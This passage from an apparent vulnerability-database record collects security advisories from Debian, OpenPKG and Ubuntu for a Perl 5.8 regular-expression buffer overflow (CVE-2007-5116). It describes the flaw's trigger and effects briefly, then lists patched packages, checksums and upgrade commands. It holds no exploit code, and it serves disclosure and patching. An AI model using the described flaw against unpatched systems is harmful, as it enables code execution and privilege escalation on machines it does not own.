        "data": "Buffer overflow in the polymorphic opcode support in the Regular Expression Engine (regcomp.c) in Perl 5.8 allows context-dependent attackers to execute arbitrary code by switching from byte to Unicode (UTF) characters in a regular expression. Perl is prone to a buffer-overflow vulnerability because it fails to sufficiently bounds-check user-supplied input. This facilitates the remote compromise of affected computers. \nPerl 5.8 is vulnerable to this issue; other versions may also be affected. Perl is a free and powerful programming language. An error in the way Perl\u0027s regular expression engine calculates the space required to process regular expressions could allow a local attacker to elevate privileges. \n\nFor the stable distribution (etch), this problem has been fixed in\nversion 5.8.8-7etch1. \n\nFor the old stable distribution (sarge), this problem has been fixed in\nversion 5.8.4-8sarge6. \n\nFor the unstable distribution (sid), this problem will be fixed soon. \n\nSome architectures are missing from this DSA; these updates will be\nreleased once they are available. \n\nWe recommend that you upgrade your perl package. \n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n  Source archives:\n\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6.dsc\n      Size/MD5 checksum:     1031 653d1eaa085e027d325a520653e9785c\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6.diff.gz\n      Size/MD5 checksum:   103931 b8c617d86f3baa2cd35bde936c0a76d5\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4.orig.tar.gz\n      Size/MD5 checksum: 12094233 912050a9cb6b0f415b76ba56052fb4cf\n\n  Architecture independent components:\n\n    http://security.debian.org/pool/updates/main/p/perl/libcgi-fast-perl_5.8.4-8sarge6_all.deb\n      Size/MD5 checksum:    38810 ff950bde09387a4023efff595fcb7b80\n    http://security.debian.org/pool/updates/main/p/perl/perl-doc_5.8.4-8sarge6_all.deb\n      Size/MD5 checksum:  7049010 803d0a25ddd6d3a75769b39fd44c1b21\n    http://security.debian.org/pool/updates/main/p/perl/perl-modules_5.8.4-8sarge6_all.deb\n      Size/MD5 checksum:  2178698 8f6bbe7db6414444fd5dbfb7786e6b76\n\n  Alpha architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_alpha.deb\n      Size/MD5 checksum:   804866 47b0bbfc0d2544132ac23e7bbd6fd81f\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_alpha.deb\n      Size/MD5 checksum:     1008 dddcaa51b3b5b67c881b49a996e83944\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_alpha.deb\n      Size/MD5 checksum:  3902134 e2170d1b691a118df3a3277e6f4b0af9\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_alpha.deb\n      Size/MD5 checksum:   874688 bdb3fc1c1e0bed8bc37292f12ec9e803\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_alpha.deb\n      Size/MD5 checksum:  4132780 e2539f2b62fd1a394f5424a534e9a51d\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_alpha.deb\n      Size/MD5 checksum:    37086 dd82f2321b96bc531e16857848bece42\n\n  AMD64 architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_amd64.deb\n      Size/MD5 checksum:   605148 b613969a68e576543f18f56b1956e78e\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_amd64.deb\n      Size/MD5 checksum:     1000 613477a3ba3f93013fa7a7776022d8e9\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_amd64.deb\n      Size/MD5 checksum:  3834172 7f354043d2e7bbee72c710982e4f9074\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_amd64.deb\n      Size/MD5 checksum:   791816 3541cf654fc59dd564c7af6642fae4df\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_amd64.deb\n      Size/MD5 checksum:  3935362 38fb00c40a25985bf22cfe9805543349\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_amd64.deb\n      Size/MD5 checksum:    32846 2f8cd32f087f60c61457f73f75fe3781\n\n  ARM architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_arm.deb\n      Size/MD5 checksum:   613158 30cd5528198d49208274e50e60611b0a\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_arm.deb\n      Size/MD5 checksum:     1026 fc64aa8b67f46fcccb6d85db7cb242ad\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_arm.deb\n      Size/MD5 checksum:  3132808 226a69d4fa30d1e0a40f4d761826c230\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_arm.deb\n      Size/MD5 checksum:   737524 b4aaf84bd60fef147d1131c5ffbc6a0a\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_arm.deb\n      Size/MD5 checksum:  3719460 8e8d12058f9f7fb9e153d4c3ff79d0f4\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_arm.deb\n      Size/MD5 checksum:    29880 faa9dc0401eb667e202e12f2d2cf9643\n\n  HP Precision architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_hppa.deb\n      Size/MD5 checksum:   654704 4efe04a8f2a81c81860148da029a88a8\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_hppa.deb\n      Size/MD5 checksum:     1006 5081a0e11c583460919427c5b0c99a0d\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_hppa.deb\n      Size/MD5 checksum:  3922234 a2b4f6549b23dd3a6c11ff97b6377d3d\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_hppa.deb\n      Size/MD5 checksum:   867856 0955f80a504eb620dbab22129fe96dd3\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_hppa.deb\n      Size/MD5 checksum:  3910388 59e8e003f4d65c3e42785226c90d5466\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_hppa.deb\n      Size/MD5 checksum:    34496 46aee518b3411566edf62ea822e0edfd\n\n  Intel IA-32 architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_i386.deb\n      Size/MD5 checksum:   567034 2edc13b9a19f6291bb300bcc28b815bd\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_i386.deb\n      Size/MD5 checksum:   508698 9f275f4137b40e5cd465e3073527ad34\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_i386.deb\n      Size/MD5 checksum:  3239308 bd4934402fadbd7c6c6c00260a4ecb88\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_i386.deb\n      Size/MD5 checksum:   753218 4f70cd1586e664189be02a84247efe5d\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_i386.deb\n      Size/MD5 checksum:  3736626 8710f57842322a711abf6161f57e9bc1\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_i386.deb\n      Size/MD5 checksum:    31706 d4e08f75b79d3bb75b4bdea55d668b6f\n\n  Intel IA-64 architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_ia64.deb\n      Size/MD5 checksum:   866526 1f01d28dbc0d3fac81fbf120d048896a\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_ia64.deb\n      Size/MD5 checksum:     1000 07c5c9823c9ff29b96ce76c63e4dfd16\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_ia64.deb\n      Size/MD5 checksum:  4027978 0919c0c823170c46578a52df90f69cfc\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_ia64.deb\n      Size/MD5 checksum:  1046706 7f724a26677aa52c39182a5109bd3bf9\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_ia64.deb\n      Size/MD5 checksum:  4534722 9a16fed74de4e2e0c43b1135c15df9d3\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_ia64.deb\n      Size/MD5 checksum:    50106 e73b65a4b267ca99ba48ef64de4dfdc1\n\n  Motorola 680x0 architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_m68k.deb\n      Size/MD5 checksum:   457778 f25f1ebbbb4a5ce7b7a4a79c6256987e\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_m68k.deb\n      Size/MD5 checksum:     1040 9882ea5db94e569a35209a66c74bb390\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_m68k.deb\n      Size/MD5 checksum:  3815032 321dd2b80abad424b678f260d18f323a\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_m68k.deb\n      Size/MD5 checksum:   692196 733bfa10857d842bd907f408b03a8b3d\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_m68k.deb\n      Size/MD5 checksum:  3008672 81a0d0613ebe7b9affcd56174e1f955c\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_m68k.deb\n      Size/MD5 checksum:    27934 68de12bace4cf3de7a339b25119b1611\n\n  Big endian MIPS architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_mips.deb\n      Size/MD5 checksum:   657066 7e2c9980c630b3aa1e60348a4998665a\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_mips.deb\n      Size/MD5 checksum:     1032 3da5c1e82b6194beac8fe7020a38d7a3\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_mips.deb\n      Size/MD5 checksum:  3384320 edfa53822abb7626b2bfd6ac4d5923df\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_mips.deb\n      Size/MD5 checksum:   781078 f4a7b2e1bbd95c9381503b382d35ba58\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_mips.deb\n      Size/MD5 checksum:  4017490 ddca3a084b7c9f1b841bd3f93e39a1d0\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_mips.deb\n      Size/MD5 checksum:    32314 51f707f1c1d3df1c3ad05dc545512c10\n\n  Little endian MIPS architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_mipsel.deb\n      Size/MD5 checksum:   653134 bbb4600b3f9f2512fe9a9233bd06370e\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_mipsel.deb\n      Size/MD5 checksum:     1008 42770abda5e92de95a180097e8588304\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_mipsel.deb\n      Size/MD5 checksum:  3125468 db2214e0762dab59ebe7237fbe8d80b2\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_mipsel.deb\n      Size/MD5 checksum:   781866 c3b6aa7d16d60fc0a083601801d57cdd\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_mipsel.deb\n      Size/MD5 checksum:  3967958 2d941edd8a70f1461f4bc7ec9b97a396\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_mipsel.deb\n      Size/MD5 checksum:    32426 c16e24f77488ab690b9c73d33e9fd7be\n\n  PowerPC architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_powerpc.deb\n      Size/MD5 checksum:   624852 fc0e31770a095b3180e8d29daac7ccc7\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_powerpc.deb\n      Size/MD5 checksum:      988 5668a4e4abcab40b924c2855c4c34f62\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_powerpc.deb\n      Size/MD5 checksum:  3509282 9e72e0a6a0d0108d701e9071e0ed4c3b\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_powerpc.deb\n      Size/MD5 checksum:   790186 fa6005f52c5a101e053dc24e5247f025\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_powerpc.deb\n      Size/MD5 checksum:  3700840 fe73cfba8f036b63839141d4a0564d49\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_powerpc.deb\n      Size/MD5 checksum:    33564 e6d5ea2116ea4f5332c1ce887aa9b727\n\n  IBM S/390 architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_s390.deb\n      Size/MD5 checksum:   604302 92d8311292f70764bafc0b015818d39d\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_s390.deb\n      Size/MD5 checksum:      996 8870e77ca4719c8cc1c67f6ac15ee36c\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_s390.deb\n      Size/MD5 checksum:  3819836 84eed51f2f162825d3bda29af8ddb203\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_s390.deb\n      Size/MD5 checksum:   800590 ee302b41b1d011e089cb43db508415ef\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_s390.deb\n      Size/MD5 checksum:  4235554 367b0ca68cd88842507c781cbb0e1f84\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_s390.deb\n      Size/MD5 checksum:    33240 54ef9ae270587bb4c88f0e2b25d73347\n\n  Sun Sparc architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_sparc.deb\n      Size/MD5 checksum:   582166 027797bd12344393503ebae3344dfd43\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_sparc.deb\n      Size/MD5 checksum:     1006 4183b345e38cd2dcbca8c24cf3d02918\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_sparc.deb\n      Size/MD5 checksum:  3547444 716f93769b9aa9c442044f9fe96c77c7\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_sparc.deb\n      Size/MD5 checksum:   775850 6ef7c40ecdd6e08dbb37d0c02f8c89a2\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_sparc.deb\n      Size/MD5 checksum:  3840628 e665c9ff077083f5719b7574e24fae05\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_sparc.deb\n      Size/MD5 checksum:    31038 64fcafc906130c016eb45f2394c5b4a8\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\n  Source archives:\n\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1.dsc\n      Size/MD5 checksum:     1033 92799d6842afb4c5a9cbf483591b2c36\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1.diff.gz\n      Size/MD5 checksum:    93005 caec226784d13b4108af359206f4dfe9\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8.orig.tar.gz\n      Size/MD5 checksum: 12829188 b8c118d4360846829beb30b02a6b91a7\n\n  Architecture independent components:\n\n    http://security.debian.org/pool/updates/main/p/perl/libcgi-fast-perl_5.8.8-7etch1_all.deb\n      Size/MD5 checksum:    40906 ac1a3065102a3bb7920a976833f1d3cc\n    http://security.debian.org/pool/updates/main/p/perl/perl-doc_5.8.8-7etch1_all.deb\n      Size/MD5 checksum:  7348690 c36b83c80b2c35515f3e6dec6451fda1\n    http://security.debian.org/pool/updates/main/p/perl/perl-modules_5.8.8-7etch1_all.deb\n      Size/MD5 checksum:  2313532 915e64aecc9e15678125def5267ea809\n\n  Alpha architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_alpha.deb\n      Size/MD5 checksum:   821314 682e53e9c6736c48e31ea26e8697c870\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_alpha.deb\n      Size/MD5 checksum:     1016 252a644a15275db90c1a9273e6f3b854\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_alpha.deb\n      Size/MD5 checksum:  4135606 4925efac08f96859a7c8b47b886e0533\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_alpha.deb\n      Size/MD5 checksum:   877900 03dce75ac1f4c9765a24f6f25ba01251\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_alpha.deb\n      Size/MD5 checksum:  2928420 1a9ab7809416b7cfc068180646414576\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_alpha.deb\n      Size/MD5 checksum:    36248 927d991a17103561f701fb56d512279d\n\n  AMD64 architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_amd64.deb\n      Size/MD5 checksum:   630480 cdfbd258b8ee105250f389c3adfdc16e\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_amd64.deb\n      Size/MD5 checksum:     1010 101f7c5357740b63a670ae874a3a498a\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_amd64.deb\n      Size/MD5 checksum:  4238220 a2a9c0db784cc91e249f23e5564207bd\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_amd64.deb\n      Size/MD5 checksum:   808804 469c3fd8e358d917225dd49f987bbf8d\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_amd64.deb\n      Size/MD5 checksum:  2734912 d34da61c02d263e230b55f911d2dc748\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_amd64.deb\n      Size/MD5 checksum:    32798 afac9013d139c7ab1276f50cc35f4512\n\n  ARM architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_arm.deb\n      Size/MD5 checksum:   561934 9739f475931e29fb26e23873df727e04\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_arm.deb\n      Size/MD5 checksum:     1018 77926e3d601fe1ed9bd75ef5a854d4e4\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_arm.deb\n      Size/MD5 checksum:  3412144 73c5f41073926ea641d06032b0c5d228\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_arm.deb\n      Size/MD5 checksum:   760246 574a68af0f13bc1a80d97c0eaa9ca4fc\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_arm.deb\n      Size/MD5 checksum:  2545942 7fb21c951bfd70b24e9b63a4025059f4\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_arm.deb\n      Size/MD5 checksum:    30358 ed5a223824e775a2e37b8e492e25abcb\n\n  HP Precision architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_hppa.deb\n      Size/MD5 checksum:   693944 441ce7894fc9d46c3a285b8681097a24\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_hppa.deb\n      Size/MD5 checksum:     1014 068b7030ce2e74328a567f560690e208\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_hppa.deb\n      Size/MD5 checksum:  4192184 916514f48c2d5ab511aac0c9d878d133\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_hppa.deb\n      Size/MD5 checksum:   868288 7eb4c3e38c25285bc6a0ab6dc5a1d770\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_hppa.deb\n      Size/MD5 checksum:  2735540 ff004f914a26621775d0247834e78cae\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_hppa.deb\n      Size/MD5 checksum:    33210 c035eeb23dc4a1e04444065ae75f7b24\n\n  Intel IA-32 architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_i386.deb\n      Size/MD5 checksum:   585382 a27a344126f78b50c6874887ba8a7dec\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_i386.deb\n      Size/MD5 checksum:   526956 2ae05903f4a08189e5319c4ca869828a\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_i386.deb\n      Size/MD5 checksum:  3578468 e6a886c21a58d96083d0385ef602df75\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_i386.deb\n      Size/MD5 checksum:   762180 e7d2c75b547db6c71e77395461c62e82\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_i386.deb\n      Size/MD5 checksum:  2491880 f01678cc32a118929a22ee765ccd4768\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_i386.deb\n      Size/MD5 checksum:    32094 56c5c6dded2172596d6bbea68d94068e\n\n  Intel IA-64 architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_ia64.deb\n      Size/MD5 checksum:   977484 94fd1bb72f48559786abedc8b0ea6107\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_ia64.deb\n      Size/MD5 checksum:     1006 9272b8f38e0b68c7143401bbe0dd10b3\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_ia64.deb\n      Size/MD5 checksum:  4335608 4caae66d357b7c8f6a9d3b6ec1b98ac1\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_ia64.deb\n      Size/MD5 checksum:  1153272 e61d597589339745c714ada2fa54d397\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_ia64.deb\n      Size/MD5 checksum:  3364174 d31a368b96392b89af59fbb529c81d20\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_ia64.deb\n      Size/MD5 checksum:    51270 84b6fde3b7ed1898b59267b994efb4ff\n\n  Little endian MIPS architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_mipsel.deb\n      Size/MD5 checksum:   687114 8973b906567dd752c73039a89dcb14ee\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_mipsel.deb\n      Size/MD5 checksum:     1012 47029166d1e495ad05a251d4946fbdc2\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_mipsel.deb\n      Size/MD5 checksum:  3413386 5ff0e279c6934b01d4bf163a5b171584\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_mipsel.deb\n      Size/MD5 checksum:   784352 dece00126cd1cf8c07ec673bd8043e6d\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_mipsel.deb\n      Size/MD5 checksum:  2729528 194373b4343008cc33b345744b7935fa\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_mipsel.deb\n      Size/MD5 checksum:    32336 98092e70a5ea30153ec32f1d87cde1e4\n\n  PowerPC architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_powerpc.deb\n      Size/MD5 checksum:   653158 7b39e1fb1a940e19ebe4e9df9f6c1abb\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_powerpc.deb\n      Size/MD5 checksum:     1010 4f68cd00058bfe50e5353cc2f1027e30\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_powerpc.deb\n      Size/MD5 checksum:  3824518 514b283d68bdb8ab5f8211b86fba6dd7\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_powerpc.deb\n      Size/MD5 checksum:   810514 54511356fc749a7518d6339d4832ab3e\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_powerpc.deb\n      Size/MD5 checksum:  2709230 f62606ee2641c529eed8d6f2aff8489e\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_powerpc.deb\n      Size/MD5 checksum:    32902 de438d275e8c95f5dba5096386f3bdbd\n\n  Sun Sparc architecture:\n\n    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_sparc.deb\n      Size/MD5 checksum:   594254 32f78d47a9fdb90ac99363642330cea5\n    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_sparc.deb\n      Size/MD5 checksum:     1012 b4cdde1e439f59c484701a503271f3ba\n    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_sparc.deb\n      Size/MD5 checksum:  3796708 d85383c57b38d1da74f5d4fed6e33c02\n    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_sparc.deb\n      Size/MD5 checksum:   783042 675e8693a697b670936108a3baeded7f\n    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_sparc.deb\n      Size/MD5 checksum:  2565704 7419d49d4b7ac54b849d432177a3ff36\n    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_sparc.deb\n      Size/MD5 checksum:    31072 40d9e6abb0fd11019912c4877c8bf3ac\n\n  These files will probably be moved into the stable distribution on\n  its next update. \n\nReferences:\n    [0] http://www.perl.com/\n____________________________________________________________________________\n\nPrimary Package Name:    perl\nPrimary Package Home:    http://openpkg.org/go/package/perl\n\nCorrected Distribution:  Corrected Branch: Corrected Package:\nOpenPKG Community        CURRENT           perl-5.8.8-20071108\n____________________________________________________________________________\n\nFor security reasons, this document was digitally signed with the\nOpenPGP public key of the OpenPKG GmbH (public key id 61B7AE34)\nwhich you can download from http://openpkg.com/openpkg.com.pgp\nor retrieve from the OpenPGP keyserver at hkp://pgp.openpkg.org/. \nFollow the instructions at http://openpkg.com/security/signatures/\nfor more details on how to verify the integrity of this document. =========================================================== \nUbuntu Security Notice USN-552-1          December 04, 2007\nperl vulnerability\nCVE-2007-5116\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 6.10\nUbuntu 7.04\nUbuntu 7.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  libperl5.8                      5.8.7-10ubuntu1.1\n\nUbuntu 6.10:\n  libperl5.8                      5.8.8-6ubuntu0.1\n\nUbuntu 7.04:\n  libperl5.8                      5.8.8-7ubuntu0.1\n\nUbuntu 7.10:\n  libperl5.8                      5.8.8-7ubuntu3.1\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes. \n\nDetails follow:\n\nIt was discovered that Perl\u0027s regular expression library did not correctly\nhandle certain UTF sequences. \n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1.diff.gz\n      Size/MD5:   165472 98da6197bbc7b042806866f19809a8b5\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1.dsc\n      Size/MD5:      737 a90e131231bab24114d318e852fbc451\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7.orig.tar.gz\n      Size/MD5: 12512211 dacefa1fe3c5b6d7bbc334ad94826131\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.7-10ubuntu1.1_all.deb\n      Size/MD5:  7207544 8a96f50ff5738a2fafd7beb74a02f435\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.7-10ubuntu1.1_all.deb\n      Size/MD5:  2325742 021c622fda16904921dfcf02a6aa96c4\n    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.7-10ubuntu1.1_all.deb\n      Size/MD5:    40008 bd31ddd280da57be85e00c7c19d1f457\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.1_amd64.deb\n      Size/MD5:   640850 9d0719b4779da8f93fedfb0eb654132b\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.1_amd64.deb\n      Size/MD5:     1012 9c697f9e42f949736cf725e9c2774371\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.1_amd64.deb\n      Size/MD5:   820628 080304d81ce38cc91246c8c2b7ee891f\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.1_amd64.deb\n      Size/MD5:    31478 dc27f9788ff01fd5097976ee75626e61\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1_amd64.deb\n      Size/MD5:  3978354 6d79ae2514a3ec9f152d0de125531192\n    